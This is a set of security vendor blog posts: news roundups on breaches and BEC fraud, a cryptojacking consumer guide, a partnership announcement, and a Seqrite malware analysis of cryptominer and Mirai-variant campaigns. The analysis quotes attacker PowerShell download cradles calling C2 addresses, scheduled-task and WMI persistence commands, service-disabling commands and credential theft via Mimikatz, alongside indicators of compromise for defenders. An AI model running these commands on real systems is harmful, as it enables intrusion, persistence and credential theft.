A new cybersecurity survey conducted by endpoint management specialists 1E and technology market researchers Vanson Bourne, a survey that questioned 600 IT operations and IT security decision-makers across the U.S. and U.K., and found that 60% of the organizations had been breached in the last two years and 31% had been breached more than once.

AESDDoS Botnet Malware Exploits CVE-2019-3396 to Perform Remote Code Execution, DDoS Attacks, and Cryptocurrency Mining

Trend Micro’s honeypot sensors detected an AESDDoS botnet malware variant exploiting a server-side template injection vulnerability in a collaboration software program used by DevOps professionals. 

U.K. Prime Minister Theresa May Fires Defense Secretary Gavin Williamson Over Huawei Leak

British Prime Minister Theresa May fired Defense Secretary Gavin Williamson, saying he leaked sensitive information surrounding a review into the use of equipment from China’s Huawei Technologies Co. in the U.K.’s telecoms network. 

This Hacker Is Selling Dangerous Windows 0-Day Hacks For Past 3 Years

report by ZDNet has revealed that a mysterious hacker is selling Windows zero-day exploits to the world’s most notorious cybercrime groups for the past three years. At least three cyber-espionage groups also known as Advanced Persistent Threats (APTs) are regular customers of this hacker.

Docker Hub Repository Suffers Data Breach, 190,000 Users Potentially Affected

In an email sent to their customers on April 26, Docker reported that the online repository of their popular container platform suffered a data breach that affected 190,000 users. 

IC3: BEC Cost Organizations US$1.2 Billion in 2018

In the recently published 2018 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3), the agency states that in 2018 alone, it received 20,373 BEC/email account compromise (EAC) complaints that racked up a total of over US$1.2 billion in adjusted losses. 

Trend Forward Capital’s First Startup Pitch Competition in Dallas

Trend Forward Capital, in a partnership with Veem, is bringing its Forward Thinker Award and pitch competition to Dallas on May 20. 

BEC Scammers Steal US$1.75 Million From an Ohio Church

The Saint Ambrose Catholic Parish in Brunswick, Ohio was the victim of a BEC attack when cybercriminals gained access to employee email accounts and used them to trick other members of the organization into wiring the payments into a fraudulent bank account. 

Cybersecurity Experts Share Tips And Insights For World Password Day

May 2 is World Password Day. World Password Day falls on the first Thursday in May each year and is intended to raise awareness of password best practices and the need for strong passwords. 

Confluence Vulnerability Opens Door to GandCrab

A vulnerability in a popular devops tool could leave companies with a dose of ransomware to go with their organizational agility, according to researchers at Trend Micro and Alert Logic.

Were you surprised by the amount of business email compromise complaints the FBI received in 2018? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: BEC Attacks and Botnet Malware appeared first on .

High Value Cryptocurrency Stolen by Hackers

Reading Time: ~2 min.

Hackers Breach Private Keys to Steal Cryptocurrency

A possible coding error allowed hackers to compromise at least 732 unique, improperly secured private keys used in the Ethereum blockchain. By exploiting a vulnerability, hackers have successfully stolen 38,000 Ethereum coins so far, translating to over $54 million in stolen funds, though the current number is likely much higher. While uncommon, such attacks do show that the industry’s security and key-generation standards have plenty of room for improvement.

Prominent Malware Reverse Engineer Faces Jail Time

The malware researcher Marcus Hutchins, who successfully reversed and stopped the WannaCry ransomware attacks in 2017, is facing up to six years of jail time for prior malware creation and distribution. Hutchins’ charges all tie back to his involvement in the creation of Kronos, a widespread banking Trojan that’s caused significant damage around the world.

Data Exposed for Thousands of Rehab Patients

Personally identifiable data belonging to nearly 145,000 patients of a Pennsylvania rehab facility have been found in a publicly available database. After a Shodan search, researchers discovered the database that contained roughly 4.9 million unique documents showing information ranging from names and birthdays to specific medical services provided and billing records, all of which could be used to to steal the identity of these thousands of individuals.

Study Finds Password Security Still Lacking

After this year’s review of password security it may come as no surprise that the top five passwords still in use are simple and have remained at the top for some time. Using a list generated from past data breaches, researchers found the password “123456” was used over 23 million times, with similar variations rounding out the top five. Several popular names, sports teams, and bands like blink182 and Metallica are still in use for hundreds of thousands of accounts. While these passwords may be easy to remember, they are exceedingly simple to guess. Stronger passwords should include multiple words or numbers to increase the complexity.

Bodybuilding Site Breached through Phishing Campaign

The website bodybuilding.com has announced they were the victim of a data breach stemming from an email phishing campaign in July 2018 that could affect many of the site’s clients. Fortunately, the site doesn’t store full payment card data, and the data it does store is only stored at the customer’s request, leaving little data for hackers to actually use. The site also forced a password reset for all users issued a warning about suspicious emails coming from bodybuilding.com, noting they may be part of another phishing campaign.

The post High Value Cryptocurrency Stolen by Hackers appeared first on Webroot Blog.

Miners snatching open source tools to strengthen their malevolent power!

Estimated reading time: 10 minutes

From the last one year, Quick Heal Security Labs has been observing a boost in the number of mining malware. One of the ways to earn cryptocurrencies is to mine them. Nowadays cryptocurrency miner malware have become hot attack vectors for cybercriminals due to its ease of deployment and instant return on investments. We usually observe that such miners come with different techniques to deliver it to a victim. Attacker can download original open source software and slightly modify them rather than completely writing their own module.

In this blog post, we would talk about couple of cases where attack scenario is built on top of these open source tools. We would also talk about how the trend of abusing open source tools for building new malware is helping malware authors.

The trend is observed especially in cryptojacking cases. Though cryptojacking is a direct source of income for cybercriminals, stolen information from the victim’s systems can yield additional money for cybercriminals. So, these open source tools are used for various purposes like downloading frameworks, information stealing, crypto-mining, DNS Changer, Mirai bot and many more. This helped a lot to form a botnet of similar hosts to produce more hashes per second. Often such open source tools are easily available on Github and similar platforms. We can classify them as exploit frameworks, vulnerability scanners, password stealer, privilege elevators, evaders, etc.


Infection vector:

We received a miner downloader which downloads multiple components of the attack. This script may come to your system through spam mails, malicious URLs, free software bundler or any conventional method that is being used by all the malware variants. Also, we suspect that a powershell script seems to be the initial culprit. The behavior of the miner is a bit recursive in nature so we could not confirm its initial trace in the system.


Technical Analysis:

Fig. 1 Working of miner

The miner downloader creates a file named as ‘xpdown.dat’ which contains some IP addresses of C2 servers from where it downloads further components.

45.58.135.106
103.95.28.54
103.213.246.23
74.222.14.61
Ok.xmr6b.ru

It then downloads the following files from the domains:

hxxp://45.58.135.106/xpdown.dat
hxxp://45.58.135.106/down.html
hxxp://45.58.135.106/ok/64.html

It contains the IP which downloads the CPU Miner (174.128.248.10)

hxxp://45.58.135.106/kill.txt

It contains the following list of process to kill if it was running on victim machine.

lsmose.exe                            lsmos.exe                         conime.exe                            lsmosee.exe
1.exe                                      lsazs.exe                           tasksche.exe                          Zationa.exe
csrs.exe                                 shennong.bat                  svshpst.exe                            Spoolvs.exe
svchsot.exe                           xmrig.exe                        srvany.exe                              WinSCV.exe
csrswz.exe                            csrs.exe                              seser.exe                                severxxs.exe
mssecsvc.exe                       mssecsvr.exe                    dsbws.exe


Then malware downloads a text file which contains the information of multiple payloads to be downloaded.

hxxp://45.58.135.106/down.txt

And this down.txt contains the following links. The malware then opens a TCP port 32381 on the system.

hxxp://213.183.45.201/downs.exe              (C:\windows\system\downs.exe)
hxxp://66.117.6.174/ups.rar                         (C:\windows\system\cab.exe)
hxxp://213.183.60.7/b.exe                            (C:\windows\inf\msief.exe)
hxxp://174.128.239.250/item.dll                 (C:\windows\debug\item.dat)

Looking at the links in the file we observed following things.

Downs.exe is a modified version of Microsoft “CACLS” (Which displays and modifies the access control list). Ups.rar is downloaded as cab.exe. This component is a downloader for windows variant of Mirai botnet. This also acts as a DNS Changer and opens a backdoor in the system. On execution, it performs multiple operations like modifying the DNS entry in the host with IP “223.5.5.5” which has the Geo location in China and ISP of DNS is “Hangzhou Alibaba Advertising Co.,Ltd.”

 

Fig. 2 Window Server Check

 

Then it checks whether the compromised machine is a window server or not by calling GetVersionExA. It downloads update.txt from C2 server, if the machine is server, and drops at “C:\windows\system\uplist.txt”. The uplist.txt contains the following payload to be downloaded and executed.

hxxp://66.117.6.174/wpd.jpg                     (C:\windows\system\msinfo.exe)
hxxp://66.117.6.174/my1.html                   (C:\windows\system\my1.bat)

It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll. These are files used for network packets processing loaded by msinfo.exe during its execution.

Let’s look into these components one by one.

my1.bat:

It contains the code which is very stealthy and evasive as it uses several techniques such as “Squiblydoo”, “download cradle” and WMI Event Subscription persistence exploit to run malicious content on infected machines.

The WMI script contains multiple PowerShell scripts.

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://173.208.139.170/s.txt’)

This text file contains another PowerShell downloader as follows:

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(‘hxxp://74.222.1.38/up.txt’)

“Up.txt” contains the code which collects information regarding System OS, Physical Memory, List of running processes using WMI classes and then downloads Powershell format of Mimikatz from Github.

Further it steals the credentials from the compromised machine and uploads it to the FTP server IP:192.187.111.66 with hard coded credential of FTP.

Fig. 3 Victims Data in FTP Server.

Msinfo.exe:

 It is basically a windows version of Mirai botnet. As more of its code matches with Mirai source code which was leaked previously. Upon execution with command line parameters “-create” “-run”, it checks the architecture of the current system whether it is x86, MIPS, ARM etc. Based on the identification, it will check for its latest update and download if available.

It performs the following task as per an encrypted file downloaded from C2 server.

  1. Implements spreader mechanism by performing in the form of blind SQLi (sql injection), brute force techniques by using crack library and hydra tool.
              [Cracker:Telnet][Cracker:MSSQL] [Cracker:CCTV][Cracker:MS17010], CrackerWMI, CrackerSSH
  1. It scans various ports such as 80,8000,445 using masscan (a very fastport scanner an open source project) which operates similar to nmap , the popular port scanning tool.
              https://github.com/robertdavidgraham/masscan
  1. Disable specific services by invoking the following command:
              C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm
              start= disabled&sc stop NlaSvc&sc config     NlaSvc start=disabled
  1. It also performs network scan for which it collects the Public/Private IP of the system and all the  associated information such as Geo Location etc. Then attacker spoofs his own IP against the current system IP and using masscan it performs scanning of other devices.

By these steps it converts this system into a bot and adds to their bot network. Its code has been developed in C++ and distributed across many sources like-

CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
CThreadPool.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
cService.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp WPD.cpp

It basically targets IoT devices which contain embedded Linux. So it has used BusyBox (a software suite that provides UNIX utilities also called as Swiss Army Knife of embedded Linux) for executing remote commands after compromising/cracking those devices through various ways mentioned above.


VBS/BAT Agent For Download Miner:

First the payload will be dropped and executed on the below location in the victim machine.

hxxp://213.183.60.7/b.exe                      ( downloaded at C:\windows\inf\msief.exe)

On execution, it will drop the VBS and batch file in the below mentioned location and execute the vbs file by invoking wscript.exe which eventually execute the bat file.

C:\Windows\web\c3.bat
C:\Windows\web\n.vbs

The bat file contains a lot of code, which will modify attributes of some folder/files, kill some specific processes, delete some files, modifies the access control of some folder/files, make persistent for multiple payload in the system via registry, task scheduler, WMI Event subscription and also modifies the firewall policy by blocking 445,139 ports.

 

Fig. 4 Part of C3.bat code

There are also two more additional payloads which are downloaded from one of C2 server present in xpdown.dat; one is a diskwritter, a DLL file , dropped at “C:\Windows\debug” location. It will execute on system start as it has an entry in task scheduler added by the above bat file.

schtasks /create /tn “Mysa1” /tr “rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa” /ru “system”  /sc onstart /F

And the second one is the final payload i.e. XMRig Monero Miner, a 64 bit executable downloaded from hxxp://174.128.248.10/64.rar at “C:\windows\debug\lsmos.exe”

On execution, it unpacks itself and drops 3 files on the current execution folder, one is an executable (lsmose.exe -64 bit packed with VM Protect) file and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll), which helps miner for successful execution.

One more similar case we have observed, a base64 encoded PowerShell script which is basically a cryptomining malware hiding in WMI class to evade AV and most of the security product due to its stealthy and unique feature.

After decoding we get the following code:

Fig. 5 Base64 Decoded script

 

Following is basic workflow of the malware.

Fig. 6 Basic workflow of miner with WMI class

On execution, it checks whether IP/Domain is alive or not mentioned in the code. If it is available, it requests for banner and receive a response as ‘SCM Event1 Log

Fig. 7 Request for “banner” and another PowerShell Payload

After that malware queries for ‘FilterToConsumerBinding’ WMI Class by executing the below command

$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding))

and then checks whether it contains ‘SCM Event1 Log’. If not present, then it downloads and executes in6.ps1 (64 bit) or in3.ps1 (32 bit) by Invoking Expression(IEX).

 

Fig. 8 Request for powershell script

in6.ps1/in3.ps1:

These scripts consist of two parts, first part is a base64 encoded Gzip data stream and second part contains obfuscated code. After de-obfuscation, the code reassembles similar to initial base64 encoded script with additional features.

Fig 9 decoded in6.ps1

The encoded gzip contains four files as mentioned below:

  1. ‘mini’ – Mimikatz, a credential stealer
  2. ‘mon’ – Monero CPU Miner
  3. ‘funs’ – Collection of functions having function to execute remote DLL via WMI and eternal blue vulnerable scanning.
  4. ‘sc’ – Shellcode to execute on another systems and to download same payload, if it is vulnerable to eternal blue.

It creates a WMI Class “systemcore_Updater0” under the Namespace “root\default” and adds properties like mimi, mon, funs, sc, ipsu and i17.

Fig 10 Properties of WMI Class “systemcoreUpdater0”

Then it sets the filtername=”SCM Event1 Log Filter” and consumername=”SCM Event1 Log Consumer”

When attacker uses WMI as a persistence mechanism, instances of __EventFilter,_EventConsumer and __FilterToConsumerBinding have to be created and an _InstanceCreationEvent event is fired.

In this case, attacker uses following query as the EventFilter and binds it with the initial base64 encoded script, which will eventually get executed approximately in every 3 hrs.

SELECT * FROM __InsanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System

Fig 11 Initial PS script hidden in WMI Class

It has tried to delete the task scheduler entry “sysupdater0” also checks “sysupdater0.bat” in %systemroot% , if exists remove that as well.

Modifies Windows sleep, hibernate and power plan setting by invoking the following command:
powercfg /CHANGE -standby-timeout-ac 0
powercfg /CHANGE -hibernate-timeout-ac 0
powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

It removes all WMI Object in __FilterToConsumerBinding class under Namespace “root\subscription” if filter name has not matched with “SCM Event0 Log”

Then it kills the process if it has an “ESTABLISHED” connection with port number 3333, 5555 or 7777.

It makes a list of PIDs of running “Powershell” processes and the network connections of the system. It then checks for the process with “ESTABLISHED” connection and associated port number 80 or 14444 or 14433 or 443. If no such processes exist and the count of running PowerShell processes are less than 8 then it executes the Monero Miner using “funs” module. After that it executes the mimikatz and dumps the credential irrespective of execution of Monero Miner.

It also enumerates the network addresses and checks for the IPs that are active and adds them to the property named, ‘ipsu’. It then scans those IPs to identify the systems which are vulnerable to MS17-010 (with Eternal Blue Scanner Script), stores them to the property ‘i17’ and finally executes shell code which will download the ze3.ps1 or ze6.ps1 exactly similar to in3.ps1 or in6.ps1 based on OS architecture.

Fig 12 Shell code executed by invoking “WinExec”

Shell code downloads and executes the PS Script to infect other vulnerable systems. This way it spreads and mines the other systems on the networks.

So in both the cases, the open source tools are abused heavily to perform the attack. Mimikatz, masscan, eternal blue vulnerability scanner seems to be popular tools among the malware authors. Similar techniques are being used for spreading the ransomware too. Seqrite successfully detects such attacks at various detection levels.


Indicator of Compromise:

790C213E1227ADEFD2D564217DE86AC9FE660946E1240B5415C55770A951ABFD
46BC86CFF88521671E70EDBBADBC17590305C8F91169F777635E8F529AC21044
AE161E582DE9EC380B3E0B295EFFD62EB8889AC35BC6631A9492CF41563ED14A
0E91F531A05C70B6CF3A8FA942B91A026A5B57069AA5B5C8DFE1EBCBC63AEAE9
EAEF82223EEB8CF404A1D46613D36B9E582304B215201B5E557DB578DD73E04E
30CDBB5C9E23758E8C74E9FDBAEE893D67D3BA42B3B09196CF98395738A67F56
7EC433DD0454553B09F11C39944E251E3EE32E4981F52F02ADC3011EB0CE6537
EA7CEDE3BCB8AD6A8E9FED3CB34F8E6746D445E2044455261EAD4E5092070408
88D338D9FC1990E3D48CDB7E704E785953271EEAB97F196BBCD0C4D2D76F7DC3
789CBE603582262914191882DEC7E6A6F1D61D062D2BDF21B8892BC5854C6196
9868C6F0F23FB81229E2EF765FF524602244384C420D14FFD5708341D85EF4CE
D256AF525680DF6A6178AD608D1700FE5178AA2F3EFE4A52DBCF7AD7EA524936

 

Subject Matter Expert:

Priyanka Shinde, Goutam Tripathy, Vallabh Chole
Security Labs, Quick Heal Technologies, Ltd.

The post Miners snatching open source tools to strengthen their malevolent power! appeared first on Seqrite Blog.

Cloudbric Shows Crypto Wallet Security Prowess With Latest Partnership with Bitberry

cloudbric biterry crypto wallet service security

Cloudbric is pleased to announce it has recently signed an MOU with Bitberry, an easy and safe crypto wallet run by RootOne.

As a subsidiary of Dunamu, the main company behind Korea’s largest cryptocurrency exchange Upbit, RootOne developed the Bitberry mobile app wallet to safeguard the crypto assets of users and to make it easy for users to send payments through phone numbers or email without any need to store private keys.

Currently, Bitberry has over 30 cryptocurrencies (more coming soon) available to store and send on its mobile app. Most recently, the global version has been released with both Android and iOS versions are available for download.  

Working with reputable companies is critical for Cloudbric in growing its service. Through this partnership, Cloudbric will work with Bitberry in interchanging cyber threat data, specifically fraudulent wallet addresses for Cloudbric’s soon to launch Threat Database.

Cloudbric aims to use this cyber threat intelligence for the development of its security platform and crypto asset protection service. Additionally, we will work together to create a safer crypto wallet service and will make the CLB token available through Bitberry’s platform in the future, enabling the payment of services with CLB.

Already Cloudbric provided security to various crypto exchanges and wallet services. As we move forward, the team will continue working in the blockchain security field.


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Cloudbric Shows Crypto Wallet Security Prowess With Latest Partnership with Bitberry appeared first on Cloudbric.

Cryptojacking Up 4,000% How You Can Block the Bad Guys

Cryptojacking RisingThink about it: In the course of your everyday activities — like grocery shopping or riding public transportation — the human body comes in contact with an infinite number of germs. In much the same way, as we go about our digital routines — like shopping, browsing, or watching videos — our devices can also pick up countless, undetectable malware or javascript that can infect our devices.

Which is why it’s possible that hackers may be using malware or script to siphon power from your computer — power they desperately need to fuel their cryptocurrency mining business.

What’s Cryptocurrency?

Whoa, let’s back up. What’s cryptocurrency and why would people rip off other people’s computer power to get it? Cryptocurrencies are virtual coins that have a real monetary value attached to them. Each crypto transaction is verified and added to the public ledger (also called a blockchain). The single public ledger can’t be changed without fulfilling certain conditions. These transactions are compiled by cryptocurrency miners who compete with one another by solving the complex mathematical equations attached to the exchange. Their reward for solving the equation is bitcoin, which in the crypto world can equal thousands of dollars.

Power Surge

Cryptojacking RisingHere’s the catch: To solve these complex equations and get to crypto gold, crypto miners need a lot more hardware power than the average user possesses. So, inserting malicious code into websites, apps, and ads — and hoping you click — allows malicious crypto miners to siphon power from other people’s computers without their consent.

While mining cryptocurrency can often be a harmless hobby when malware or site code is attached to drain unsuspecting users CPU power, it’s considered cryptojacking, and it’s becoming more common.

Are you feeling a bit vulnerable? You aren’t alone. According to the most recent McAfee Labs Threats Report, cryptojacking has grown more than 4,000% in the past year.

Have you been hit?

One sign that you’ve been affected is that your computer or smartphone may slow down or have more glitches than normal. Crypto mining code runs quietly in the background while you go about your everyday work or browsing and it can go undetected for a long time.

How to prevent cryptojacking

Be proactive. Your first line of defense against a malware attack is to use a comprehensive security solution on your family computers and to keep that software updated.

Cryptojacking Blocker. This new McAfee product zeroes in on the cryptojacking threat and helps prevent websites from mining for cryptocurrency (see graphic below). Cryptojacking Blocker is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

Cryptojacking Rising

Discuss it with your family. Cryptojacking is a wild concept to explain or discuss at the dinner table, but kids need to fully understand the digital landscape and their responsibility in it. Discuss their role in helping to keep the family safe online and the motives of the bad guys who are always lurking in the background.

Smart clicks. One way illicit crypto miners get to your PC is through malicious links sent in legitimate-looking emails. Be aware of this scam (and many others) and think before you click on any links sent via email.

Stick with the legit. If a website, an app, or pop-up looks suspicious, it could contain malware or javascript that instantly starts working (mining power) when you load a compromised web page. Stick with reputable sites and apps and be extra cautious with how you interact with pop-ups.

Install updates immediately. Be sure to keep all your system software up-to-date when alerted to do so. This will help close any security gaps that hackers can exploit.

Strong passwords. These little combinations are critical to your family’s digital safety and can’t be ignored. Create unique passwords for different accounts and be sure to change out those passwords periodically.

To stay on top of the latest consumer and security threats that could impact your family, be sure to listen to our podcast Hackable? And, like us on Facebook.

The post Cryptojacking Up 4,000% How You Can Block the Bad Guys appeared first on McAfee Blogs.